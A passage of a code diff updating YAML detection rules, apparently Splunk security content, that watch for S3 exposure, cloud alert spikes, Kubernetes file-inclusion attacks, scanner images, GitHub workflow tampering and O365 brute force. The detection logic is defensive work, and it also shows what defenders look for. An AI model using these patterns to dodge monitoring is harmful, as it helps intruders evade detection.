IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write
|
||||
@@ -66,7 +70,8 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1530/aws_s3_public_bucket/aws_cloudtrail_events.json
|
||||
sourcetype: aws:cloudtrail
|
||||
source: aws_cloudtrail
|
||||
update_timestamp: true
|
||||
|
||||
@@ -1,12 +1,18 @@
|
||||
name: Detect S3 access from a new IP
|
||||
id: e6f1bb1b-f441-492b-9126-902acda217da
|
||||
version: 1
|
||||
date: '2018-06-28'
|
||||
version: 2
|
||||
date: '2024-05-19'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks at S3 bucket-access logs and detects new or previously
|
||||
unseen remote IP addresses that have successfully accessed an S3 bucket.
|
||||
description: The following analytic identifies access to an S3 bucket from a new or
|
||||
previously unseen remote IP address. It leverages S3 bucket-access logs, specifically
|
||||
focusing on successful access events (http_status=200). This activity is significant
|
||||
because access from unfamiliar IP addresses could indicate unauthorized access or
|
||||
potential data exfiltration attempts. If confirmed malicious, this activity could
|
||||
lead to unauthorized data access, data theft, or further exploitation of the compromised
|
||||
S3 bucket, posing a significant risk to sensitive information stored within the
|
||||
bucket.
|
||||
data_source: []
|
||||
search: '`aws_s3_accesslogs` http_status=200 [search `aws_s3_accesslogs` http_status=200
|
||||
| stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip
|
||||
|
||||
@@ -1,14 +1,19 @@
|
||||
name: Detect Spike in AWS Security Hub Alerts for EC2 Instance
|
||||
id: 2a9b80d3-6340-4345-b5ad-290bf5d0d222
|
||||
version: 3
|
||||
date: '2021-01-26'
|
||||
version: 4
|
||||
date: '2024-05-19'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search looks for a spike in number of of AWS security Hub alerts
|
||||
for an EC2 instance in 4 hours intervals
|
||||
data_source:
|
||||
- AWS Security Hub
|
||||
description: The following analytic identifies a spike in the number of AWS Security
|
||||
Hub alerts for an EC2 instance within a 4-hour interval. It leverages AWS Security
|
||||
Hub findings data, calculating the average and standard deviation of alerts to detect
|
||||
anomalies. This activity is significant for a SOC as a sudden increase in alerts
|
||||
may indicate potential security incidents or misconfigurations requiring immediate
|
||||
attention. If confirmed malicious, this could signify an ongoing attack, leading
|
||||
to unauthorized access, data exfiltration, or disruption of services on the affected
|
||||
EC2 instance.
|
||||
data_source: []
|
||||
search: '`aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h
|
||||
_time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account)
|
||||
as vendor_account values(vendor_region) as vendor_region values(severity) as severity
|
||||
@@ -52,6 +57,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
|
||||
sourcetype: aws:securityhub:finding
|
||||
source: aws_securityhub_finding
|
||||
|
||||
@@ -1,12 +1,17 @@
|
||||
name: Detect Spike in AWS Security Hub Alerts for User
|
||||
id: 2a9b80d3-6220-4345-b5ad-290bf5d0d222
|
||||
version: 3
|
||||
date: '2021-01-26'
|
||||
version: 4
|
||||
date: '2024-05-18'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search looks for a spike in number of of AWS security Hub alerts
|
||||
for an AWS IAM User in 4 hours intervals.
|
||||
description: The following analytic identifies a spike in the number of AWS Security
|
||||
Hub alerts for an AWS IAM User within a 4-hour interval. It leverages AWS Security
|
||||
Hub findings data, calculating the average and standard deviation of alerts to detect
|
||||
significant deviations. This activity is significant as a sudden increase in alerts
|
||||
for a specific user may indicate suspicious behavior or a potential security incident.
|
||||
If confirmed malicious, this could signify an ongoing attack, unauthorized access,
|
||||
or misuse of IAM credentials, potentially leading to data breaches or further exploitation.
|
||||
data_source: []
|
||||
search: '`aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename
|
||||
findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts
|
||||
|
||||
@@ -1,13 +1,17 @@
|
||||
name: Detect Spike in blocked Outbound Traffic from your AWS
|
||||
id: d3fffa37-492f-487b-a35d-c60fcb2acf01
|
||||
version: 1
|
||||
date: '2018-05-07'
|
||||
version: 2
|
||||
date: '2024-05-12'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search will detect spike in blocked outbound network connections
|
||||
originating from within your AWS environment. It will also update the cache file
|
||||
that factors in the latest data.
|
||||
description: The following analytic identifies spikes in blocked outbound network
|
||||
connections originating from within your AWS environment. It leverages VPC Flow
|
||||
Logs data from CloudWatch, focusing on blocked actions from internal IP ranges to
|
||||
external destinations. This detection is significant as it can indicate potential
|
||||
exfiltration attempts or misconfigurations leading to data leakage. If confirmed
|
||||
malicious, such activity could allow attackers to bypass network defenses, leading
|
||||
to unauthorized data transfer or communication with malicious external entities.
|
||||
data_source: []
|
||||
search: '`cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12
|
||||
OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) [search `cloudwatchlogs_vpcflow`
|
||||
@@ -24,9 +28,8 @@ search: '`cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=17
|
||||
baseline_blocked_outbound_connections | eval dataPointThreshold = 5, deviationThreshold
|
||||
= 3 | eval isSpike=if((latestCount > avgBlockedConnections+deviationThreshold*stdevBlockedConnections)
|
||||
AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | table src_ip]
|
||||
| stats values(dest_ip) as dest_ip, values(interface_id) as "resourceId"
|
||||
count as numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip
|
||||
| `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter`'
|
||||
| stats values(dest_ip) as dest_ip, values(interface_id) as "resourceId" count as
|
||||
numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip | `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter`'
|
||||
how_to_implement: You must install the AWS App for Splunk (version 5.1.0 or later)
|
||||
and Splunk Add-on for AWS (version 4.4.0 or later), then configure your VPC Flow
|
||||
logs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit
|
||||
@@ -49,7 +52,7 @@ tags:
|
||||
asset_type: AWS Instance
|
||||
confidence: 50
|
||||
impact: 50
|
||||
message: Blocked outbound traffic from your AWS
|
||||
message: Blocked outbound traffic from your AWS
|
||||
observable:
|
||||
- name: resourceId
|
||||
type: Other
|
||||
|
||||
@@ -1,13 +1,18 @@
|
||||
name: Detect Spike in S3 Bucket deletion
|
||||
id: e733a326-59d2-446d-b8db-14a17151aa68
|
||||
version: 1
|
||||
date: '2018-11-27'
|
||||
version: 2
|
||||
date: '2024-05-03'
|
||||
author: Bhavin Patel, Splunk
|
||||
status: experimental
|
||||
type: Anomaly
|
||||
description: This search detects users creating spikes in API activity related to
|
||||
deletion of S3 buckets in your AWS environment. It will also update the cache file
|
||||
that factors in the latest data.
|
||||
description: The following analytic identifies a spike in API activity related to
|
||||
the deletion of S3 buckets in your AWS environment. It leverages AWS CloudTrail
|
||||
logs to detect anomalies by comparing current deletion activity against a historical
|
||||
baseline. This activity is significant as unusual spikes in S3 bucket deletions
|
||||
could indicate malicious actions such as data exfiltration or unauthorized data
|
||||
destruction. If confirmed malicious, this could lead to significant data loss, disruption
|
||||
of services, and potential exposure of sensitive information. Immediate investigation
|
||||
is required to determine the legitimacy of the activity.
|
||||
data_source: []
|
||||
search: '`cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket
|
||||
| spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup
|
||||
|
||||
@@ -1,13 +1,18 @@
|
||||
name: GCP Detect gcploit framework
|
||||
id: a1c5a85e-a162-410c-a5d9-99ff639e5a52
|
||||
version: 1
|
||||
date: '2020-10-08'
|
||||
version: 2
|
||||
date: '2024-05-14'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: TTP
|
||||
description: This search provides detection of GCPloit exploitation framework. This
|
||||
framework can be used to escalate privileges and move laterally from compromised
|
||||
high privilege accounts.
|
||||
description: The following analytic identifies the use of the GCPloit exploitation
|
||||
framework within Google Cloud Platform (GCP). It detects specific GCP Pub/Sub messages
|
||||
with a function timeout of 539 seconds, which is indicative of GCPloit activity.
|
||||
This detection is significant as GCPloit can be used to escalate privileges and
|
||||
facilitate lateral movement from compromised high-privilege accounts. If confirmed
|
||||
malicious, this activity could allow attackers to gain unauthorized access, escalate
|
||||
their privileges, and move laterally within the GCP environment, potentially compromising
|
||||
sensitive data and critical resources.
|
||||
data_source: []
|
||||
search: '`google_gcp_pubsub_message` data.protoPayload.request.function.timeout=539s
|
||||
| table src src_user data.resource.labels.project_id data.protoPayload.request.function.serviceAccountEmail
|
||||
|
||||
@@ -1,12 +1,18 @@
|
||||
name: GCP Kubernetes cluster pod scan detection
|
||||
id: 19b53215-4a16-405b-8087-9e6acf619842
|
||||
version: 1
|
||||
date: '2020-07-17'
|
||||
version: 2
|
||||
date: '2024-05-18'
|
||||
author: Rod Soto, Splunk
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search provides information of unauthenticated requests via user
|
||||
agent, and authentication data against Kubernetes cluster's pods
|
||||
description: The following analytic identifies unauthenticated requests to Kubernetes
|
||||
cluster pods. It detects this activity by analyzing GCP Pub/Sub messages for audit
|
||||
logs where the response status code is 401, indicating unauthorized access attempts.
|
||||
This activity is significant for a SOC because it may indicate reconnaissance or
|
||||
scanning attempts by an attacker trying to identify vulnerable pods. If confirmed
|
||||
malicious, this activity could lead to unauthorized access, allowing the attacker
|
||||
to exploit vulnerabilities within the cluster, potentially compromising sensitive
|
||||
data or gaining control over the Kubernetes environment.
|
||||
data_source: []
|
||||
search: '`google_gcp_pubsub_message` category=kube-audit |spath input=properties.log
|
||||
|search responseStatus.code=401 |table sourceIPs{} userAgent verb requestURI responseStatus.reason
|
||||
|
||||
@@ -1,13 +1,17 @@
|
||||
name: Gdrive suspicious file sharing
|
||||
id: a7131dae-34e3-11ec-a2de-acde48001122
|
||||
version: 1
|
||||
date: '2021-10-24'
|
||||
version: 2
|
||||
date: '2024-05-13'
|
||||
author: Rod Soto, Teoderick Contreras
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search can help the detection of compromised accounts or internal
|
||||
users sharing potentially malicious/classified documents with users outside your
|
||||
organization via GSuite file sharing .
|
||||
description: The following analytic identifies suspicious file-sharing activity on
|
||||
Google Drive, where internal users share documents with more than 50 external recipients.
|
||||
It leverages GSuite Drive logs, focusing on changes in user access and filtering
|
||||
for emails outside the organization's domain. This activity is significant as it
|
||||
may indicate compromised accounts or intentional data exfiltration. If confirmed
|
||||
malicious, this behavior could lead to unauthorized access to sensitive information,
|
||||
data leaks, and potential compliance violations.
|
||||
data_source: []
|
||||
search: '`gsuite_drive` name=change_user_access | rename parameters.* as * | search
|
||||
email = "*@yourdomain.com" target_user != "*@yourdomain.com" | stats count values(owner)
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: GitHub Actions Disable Security Workflow
|
||||
id: 0459f1a5-c0ac-4987-82d6-65081209f854
|
||||
version: 1
|
||||
date: '2022-04-04'
|
||||
version: 2
|
||||
date: '2024-05-17'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search detects a disabled security workflow in GitHub Actions. An
|
||||
attacker can disable a security workflow in GitHub actions to hide malicious code
|
||||
in it.
|
||||
data_source:
|
||||
description: The following analytic detects the disabling of a security workflow in
|
||||
GitHub Actions. It leverages GitHub logs to identify when a workflow, excluding
|
||||
those named *security-testing*, is disabled following a push or pull request event.
|
||||
This activity is significant as it may indicate an attempt by an attacker to conceal
|
||||
malicious code by disabling security checks. If confirmed malicious, this could
|
||||
allow the attacker to introduce and persist undetected malicious code within the
|
||||
repository, potentially compromising the integrity and security of the codebase.
|
||||
data_source:
|
||||
- GitHub
|
||||
search: '`github` workflow_run.event=push OR workflow_run.event=pull_request | stats
|
||||
values(workflow_run.name) as workflow_run.name by workflow_run.head_commit.id workflow_run.event
|
||||
@@ -63,6 +67,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/github_actions_disable_security_workflow/github_actions_disable_security_workflow.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/github_actions_disable_security_workflow/github_actions_disable_security_workflow.log
|
||||
source: github
|
||||
sourcetype: aws:firehose:json
|
||||
|
||||
@@ -1,13 +1,17 @@
|
||||
name: Gsuite suspicious calendar invite
|
||||
id: 03cdd68a-34fb-11ec-9bd3-acde48001122
|
||||
version: 1
|
||||
date: '2021-10-24'
|
||||
version: 2
|
||||
date: '2024-05-21'
|
||||
author: Rod Soto, Teoderick Contreras
|
||||
status: experimental
|
||||
type: Hunting
|
||||
description: This search can help the detection of compromised accounts or internal
|
||||
users sending suspcious calendar invites via GSuite calendar. These invites may
|
||||
contain malicious links or attachments.
|
||||
description: The following analytic detects suspicious calendar invites sent via GSuite,
|
||||
potentially indicating compromised accounts or malicious internal activity. It leverages
|
||||
GSuite calendar logs, focusing on events where a high volume of invites (over 100)
|
||||
is sent within a 5-minute window. This behavior is significant as it may involve
|
||||
the distribution of malicious links or attachments, posing a security risk. If confirmed
|
||||
malicious, this activity could lead to widespread phishing attacks, unauthorized
|
||||
access, or malware distribution within the organization.
|
||||
data_source: []
|
||||
search: '`gsuite_calendar` |bin span=5m _time |rename parameters.* as * |search target_calendar_id!=null
|
||||
email="*yourdomain.com"| stats count values(target_calendar_id) values(event_title)
|
||||
|
||||
@@ -1,21 +1,25 @@
|
||||
name: Kubernetes Nginx Ingress LFI
|
||||
id: 0f83244b-425b-4528-83db-7a88c5f66e48
|
||||
version: 2
|
||||
date: '2024-03-19'
|
||||
version: 4
|
||||
date: '2024-05-19'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This search uses the Kubernetes logs from a nginx ingress controller
|
||||
to detect local file inclusion attacks.
|
||||
data_source:
|
||||
- Kubernetes Audit
|
||||
description: The following analytic detects local file inclusion (LFI) attacks targeting
|
||||
Kubernetes Nginx ingress controllers. It leverages Kubernetes logs, parsing fields
|
||||
such as `request` and `status` to identify suspicious patterns indicative of LFI
|
||||
attempts. This activity is significant because LFI attacks can allow attackers to
|
||||
read sensitive files from the server, potentially exposing critical information.
|
||||
If confirmed malicious, this could lead to unauthorized access to sensitive data,
|
||||
further exploitation, and potential compromise of the Kubernetes environment.
|
||||
data_source: []
|
||||
search: '`kubernetes_container_controller` | rex field=_raw "^(?<remote_addr>\S+)\s+-\s+-\s+\[(?<time_local>[^\]]*)\]\s\"(?<request>[^\"]*)\"\s(?<status>\S*)\s(?<body_bytes_sent>\S*)\s\"(?<http_referer>[^\"]*)\"\s\"(?<http_user_agent>[^\"]*)\"\s(?<request_length>\S*)\s(?<request_time>\S*)\s\[(?<proxy_upstream_name>[^\]]*)\]\s\[(?<proxy_alternative_upstream_name>[^\]]*)\]\s(?<upstream_addr>\S*)\s(?<upstream_response_length>\S*)\s(?<upstream_response_time>\S*)\s(?<upstream_status>\S*)\s(?<req_id>\S*)"
|
||||
| lookup local_file_inclusion_paths local_file_inclusion_paths AS request OUTPUT
|
||||
lfi_path | search lfi_path=yes | rename remote_addr AS src_ip, upstream_status as
|
||||
| rename remote_addr AS src_ip, upstream_status as
|
||||
status, proxy_upstream_name as proxy | rex field=request "^(?<http_method>\S+)\s(?<url>\S+)\s"
|
||||
| eval phase="operate" | eval severity="high" | stats count min(_time) as firstTime
|
||||
max(_time) as lastTime by src_ip, status, url, http_method, host, http_user_agent,
|
||||
proxy, phase, severity | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
|
||||
proxy, phase, severity, request | lookup local_file_inclusion_paths local_file_inclusion_paths AS request OUTPUT
|
||||
lfi_path | search lfi_path=yes | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
|
||||
| `kubernetes_nginx_ingress_lfi_filter`'
|
||||
how_to_implement: You must ingest Kubernetes logs through Splunk Connect for Kubernetes.
|
||||
known_false_positives: unknown
|
||||
@@ -51,6 +55,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kubernetes_nginx_lfi_attack/kubernetes_nginx_lfi_attack.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kubernetes_nginx_lfi_attack/kubernetes_nginx_lfi_attack.log
|
||||
sourcetype: kube:container:controller
|
||||
source: kubernetes
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: Kubernetes Nginx Ingress RFI
|
||||
id: fc5531ae-62fd-4de6-9c36-b4afdae8ca95
|
||||
version: 3
|
||||
date: '2024-03-19'
|
||||
version: 4
|
||||
date: '2024-05-19'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This search uses the Kubernetes logs from a nginx ingress controller
|
||||
to detect remote file inclusion attacks.
|
||||
data_source:
|
||||
- Kubernetes Audit
|
||||
description: The following analytic detects remote file inclusion (RFI) attacks targeting
|
||||
Kubernetes Nginx ingress controllers. It leverages Kubernetes logs from the Nginx
|
||||
ingress controller, parsing fields such as `remote_addr`, `request`, and `url` to
|
||||
identify suspicious activity. This activity is significant because RFI attacks can
|
||||
allow attackers to execute arbitrary code or access sensitive files on the server.
|
||||
If confirmed malicious, this could lead to unauthorized access, data exfiltration,
|
||||
or further compromise of the Kubernetes environment.
|
||||
data_source: []
|
||||
search: '`kubernetes_container_controller` | rex field=_raw "^(?<remote_addr>\S+)\s+-\s+-\s+\[(?<time_local>[^\]]*)\]\s\"(?<request>[^\"]*)\"\s(?<status>\S*)\s(?<body_bytes_sent>\S*)\s\"(?<http_referer>[^\"]*)\"\s\"(?<http_user_agent>[^\"]*)\"\s(?<request_length>\S*)\s(?<request_time>\S*)\s\[(?<proxy_upstream_name>[^\]]*)\]\s\[(?<proxy_alternative_upstream_name>[^\]]*)\]\s(?<upstream_addr>\S*)\s(?<upstream_response_length>\S*)\s(?<upstream_response_time>\S*)\s(?<upstream_status>\S*)\s(?<req_id>\S*)"
|
||||
| rex field=request "^(?<http_method>\S+)?\s(?<url>\S+)\s" | rex field=url "(?<dest_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
|
||||
| search dest_ip=* | rename remote_addr AS src_ip, upstream_status as status, proxy_upstream_name
|
||||
@@ -50,6 +54,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kuberntest_nginx_rfi_attack/kubernetes_nginx_rfi_attack.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1212/kuberntest_nginx_rfi_attack/kubernetes_nginx_rfi_attack.log
|
||||
sourcetype: kube:container:controller
|
||||
source: kubernetes
|
||||
|
||||
@@ -1,14 +1,19 @@
|
||||
name: Kubernetes Scanner Image Pulling
|
||||
id: 4890cd6b-0112-4974-a272-c5c153aee551
|
||||
version: 1
|
||||
date: '2021-08-24'
|
||||
version: 2
|
||||
date: '2024-05-20'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: This search uses the Kubernetes logs from Splunk Connect from Kubernetes
|
||||
to detect Kubernetes Security Scanner.
|
||||
data_source:
|
||||
- Kubernetes Audit
|
||||
description: The following analytic detects the pulling of known Kubernetes security
|
||||
scanner images such as kube-hunter, kube-bench, and kube-recon. It leverages Kubernetes
|
||||
logs ingested through Splunk Connect for Kubernetes, specifically monitoring for
|
||||
messages indicating the pulling of these images. This activity is significant because
|
||||
the use of security scanners can indicate an attempt to identify vulnerabilities
|
||||
within the Kubernetes environment. If confirmed malicious, this could lead to the
|
||||
discovery and exploitation of security weaknesses, potentially compromising the
|
||||
entire Kubernetes cluster.
|
||||
data_source: []
|
||||
search: '`kube_objects_events` object.message IN ("Pulling image *kube-hunter*", "Pulling
|
||||
image *kube-bench*", "Pulling image *kube-recon*", "Pulling image *kube-recon*")
|
||||
| rename object.* AS * | rename involvedObject.* AS * | rename source.host AS host
|
||||
@@ -50,6 +55,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/kubernetes_kube_hunter/kubernetes_kube_hunter.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1526/kubernetes_kube_hunter/kubernetes_kube_hunter.json
|
||||
sourcetype: kube:objects:events
|
||||
source: kubernetes
|
||||
|
||||
@@ -1,14 +1,18 @@
|
||||
name: O365 Excessive Authentication Failures Alert
|
||||
id: d441364c-349c-453b-b55f-12eccab67cf9
|
||||
version: 2
|
||||
date: '2022-02-18'
|
||||
version: 3
|
||||
date: '2024-05-18'
|
||||
author: Rod Soto, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: This search detects when an excessive number of authentication failures
|
||||
occur this search also includes attempts against MFA prompt codes
|
||||
data_source:
|
||||
- O365
|
||||
description: The following analytic identifies an excessive number of authentication
|
||||
failures, including failed attempts against MFA prompt codes. It uses data from
|
||||
the `o365_management_activity` dataset, focusing on events where the authentication
|
||||
status is marked as failure. This behavior is significant as it may indicate a brute
|
||||
force attack or an attempt to compromise user accounts. If confirmed malicious,
|
||||
this activity could lead to unauthorized access, data breaches, or further exploitation
|
||||
within the environment.
|
||||
data_source: []
|
||||
search: '`o365_management_activity` Workload=AzureActiveDirectory UserAuthenticationMethod=*
|
||||
status=failure | stats count earliest(_time) AS firstTime latest(_time) AS lastTime
|
||||
values(UserAuthenticationMethod) AS UserAuthenticationMethod values(UserAgent) AS
|
||||
@@ -57,6 +61,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110/o365_brute_force_login/o365_brute_force_login.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110/o365_brute_force_login/o365_brute_force_login.json
|
||||
sourcetype: o365:management:activity
|
||||
source: o365
|
||||
|
||||
@@ -1,15 +1,24 @@
|
||||
name: O365 Excessive SSO logon errors
|
||||
id: 8158ccc4-6038-11eb-ae93-0242ac130002
|
||||
version: 3
|
||||
date: '2023-08-02'
|
||||
version: 4
|
||||
date: '2024-05-17'
|
||||
author: Rod Soto, Splunk
|
||||
status: production
|
||||
type: Anomaly
|
||||
description: The following analytic detects accounts with high number of Single Sign ON (SSO)
|
||||
logon errors. Excessive logon errors may indicate attempts to bruteforce of password or single sign on token hijack or reuse.
|
||||
data_source:
|
||||
description: The following analytic detects accounts experiencing a high number of
|
||||
Single Sign-On (SSO) logon errors. It leverages data from the `o365_management_activity`
|
||||
dataset, focusing on failed user login attempts with SSO errors. This activity is
|
||||
significant as it may indicate brute-force attempts or the hijacking/reuse of SSO
|
||||
tokens. If confirmed malicious, attackers could potentially gain unauthorized access
|
||||
to user accounts, leading to data breaches, privilege escalation, or further lateral
|
||||
movement within the organization.
|
||||
data_source:
|
||||
- O365 UserLoginFailed
|
||||
search: '`o365_management_activity` Workload=AzureActiveDirectory LogonError=*Sso* Operation=UserLoginFailed | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by src_ip signature user_agent authentication_service action| where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_excessive_sso_logon_errors_filter`'
|
||||
search: '`o365_management_activity` Workload=AzureActiveDirectory LogonError=*Sso*
|
||||
Operation=UserLoginFailed | stats count min(_time) as firstTime max(_time) as lastTime
|
||||
values(user) as user by src_ip signature user_agent authentication_service action|
|
||||
where count >= 5 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
|
||||
| `o365_excessive_sso_logon_errors_filter`'
|
||||
how_to_implement: You must install splunk Microsoft Office 365 add-on. This search
|
||||
works with o365:management:activity
|
||||
known_false_positives: Logon errors may not be malicious in nature however it may
|
||||
@@ -56,6 +65,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556/o365_sso_logon_errors/o365_sso_logon_errors2.json
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1556/o365_sso_logon_errors/o365_sso_logon_errors2.json
|
||||
sourcetype: o365:management:activity
|
||||
source: o365
|
||||
|
||||
@@ -1,61 +1,69 @@
|
||||
name: 3CX Supply Chain Attack Network Indicators
|
||||
id: 791b727c-deec-4fbe-a732-756131b3c5a1
|
||||
version: 1
|
||||
date: "2023-03-30"
|
||||
version: 2
|
||||
date: "2024-05-21"
|
||||
author: Michael Haag, Splunk
|
||||
type: TTP
|
||||
status: experimental
|
||||
data_source:
|
||||
- Sysmon EventID 22
|
||||
description: The analytic provided below employs the Network_Resolution datamodel to detect domain indicators associated with the 3CX supply chain attack. By leveraging this query, you can efficiently conduct retrospective analysis of your data to uncover potential compromises.
|
||||
search: '| tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time) as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query
|
||||
| `drop_dm_object_name(DNS)`
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| lookup 3cx_ioc_domains domain as query OUTPUT Description isIOC
|
||||
| search isIOC=true
|
||||
| `3cx_supply_chain_attack_network_indicators_filter`'
|
||||
how_to_implement: To successfully implement this search you need to be ingesting information into the `Network Resolution` datamodel in the `DNS` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA''s are installed.
|
||||
known_false_positives: False positives will be present for accessing the 3cx[.]com website. Remove from the lookup as needed.
|
||||
description: The following analytic identifies DNS queries to domains associated with
|
||||
the 3CX supply chain attack. It leverages the Network_Resolution datamodel to detect
|
||||
these suspicious domain indicators. This activity is significant because it can
|
||||
indicate a potential compromise stemming from the 3CX supply chain attack, which
|
||||
is known for distributing malicious software through trusted updates. If confirmed
|
||||
malicious, this activity could allow attackers to establish a foothold in the network,
|
||||
exfiltrate sensitive data, or further propagate malware, leading to extensive damage
|
||||
and data breaches.
|
||||
search: '| tstats `security_content_summariesonly` values(DNS.answer) as IPs min(_time)
|
||||
as firstTime from datamodel=Network_Resolution by DNS.src, DNS.query | `drop_dm_object_name(DNS)`
|
||||
| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | lookup
|
||||
3cx_ioc_domains domain as query OUTPUT Description isIOC | search isIOC=true | `3cx_supply_chain_attack_network_indicators_filter`'
|
||||
how_to_implement: To successfully implement this search you need to be ingesting information
|
||||
into the `Network Resolution` datamodel in the `DNS` node. In addition, confirm
|
||||
the latest CIM App 4.20 or higher is installed and the latest TA''s are installed.
|
||||
known_false_positives: False positives will be present for accessing the 3cx[.]com
|
||||
website. Remove from the lookup as needed.
|
||||
references:
|
||||
- https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/
|
||||
- https://www.cisa.gov/news-events/alerts/2023/03/30/supply-chain-attack-against-3cxdesktopapp
|
||||
- https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
|
||||
- https://www.3cx.com/community/threads/crowdstrike-endpoint-security-detection-re-3cx-desktop-app.119934/page-2#post-558898
|
||||
- https://www.3cx.com/community/threads/3cx-desktopapp-security-alert.119951/
|
||||
- https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/
|
||||
- https://www.cisa.gov/news-events/alerts/2023/03/30/supply-chain-attack-against-3cxdesktopapp
|
||||
- https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
|
||||
- https://www.3cx.com/community/threads/crowdstrike-endpoint-security-detection-re-3cx-desktop-app.119934/page-2#post-558898
|
||||
- https://www.3cx.com/community/threads/3cx-desktopapp-security-alert.119951/
|
||||
tags:
|
||||
analytic_story:
|
||||
- 3CX Supply Chain Attack
|
||||
- 3CX Supply Chain Attack
|
||||
asset_type: Network
|
||||
confidence: 100
|
||||
cve:
|
||||
- CVE-2023-29059
|
||||
- CVE-2023-29059
|
||||
impact: 100
|
||||
message: Indicators related to 3CX supply chain attack have been identified on $src$.
|
||||
mitre_attack_id:
|
||||
